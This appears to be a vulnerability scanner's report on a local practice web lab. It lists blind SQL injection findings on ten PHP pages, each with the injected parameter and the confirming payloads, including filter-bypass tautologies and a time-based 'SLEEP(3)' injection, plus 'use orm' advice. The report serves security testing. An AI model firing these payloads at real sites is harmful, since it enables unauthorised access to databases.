Target: http://192.168.42.133/ (GET)

---
URL:http://192.168.42.133/sqli/example1.php 
VulnName: bsqli
Query: {'name': "root'\tand\t'11501'='11501"}
payload: '	and	'11501'='11501
'	and	'89027'='89027
'	or	38067=38067#
'	and	'10692'='10693
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example2.php 
VulnName: bsqli
Query: {'name': "root'\tand\t'11501'='11501"}
payload: '	and	'11501'='11501
'	and	'89027'='89027
'	or	38067=38067#
'	and	'10692'='10693
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example3.php 
VulnName: bsqli
Query: {'name': "root'/**/and/**/'30805'='30805"}
payload: '/**/and/**/'30805'='30805
'/**/and/**/'74805'='74805
'/**/or/**/30478=30478#
'/**/and/**/'25840'='25841
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example4.php 
VulnName: bsqli
Query: {'id': '2\tand\t99184=99184'}
payload: 	and	99184=99184
	and	32011=32011
	or	42821=42821#
	and	51709=51710
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example5.php 
VulnName: bsqli
Query: {'id': '2\tand\t99184=99184'}
payload: 	and	99184=99184
	and	32011=32011
	or	42821=42821#
	and	51709=51710
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example6.php 
VulnName: bsqli
Query: {'id': "2'+and+'66432'='66432"}
payload: '+and+'66432'='66432
'+and+'65456'='65456
'+or+82632=82632#
'+and+'19939'='19940
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example7.php 
VulnName: bsqli
Query: {'id': '2\nand\n29584=29584'}
payload: 
and
29584=29584

and
13613=13613

or
12781=12781#

and
79159=79160
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example8.php 
VulnName: bsqli
Query: {'order': 'name'}
payload: ` or SLEEP(3);-- 
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example9.php 
VulnName: bsqli
Query: {'order': 'name'}
payload:  or SLEEP(3);-- 
advice: use orm
---
---
URL:http://192.168.42.133/xml/example2.php 
VulnName: bsqli
Query: {'name': "hacker'+and+'66432'='66432"}
payload: '+and+'66432'='66432
'+and+'65456'='65456
'+or+82632=82632#
'+and+'19939'='19940
advice: use orm
---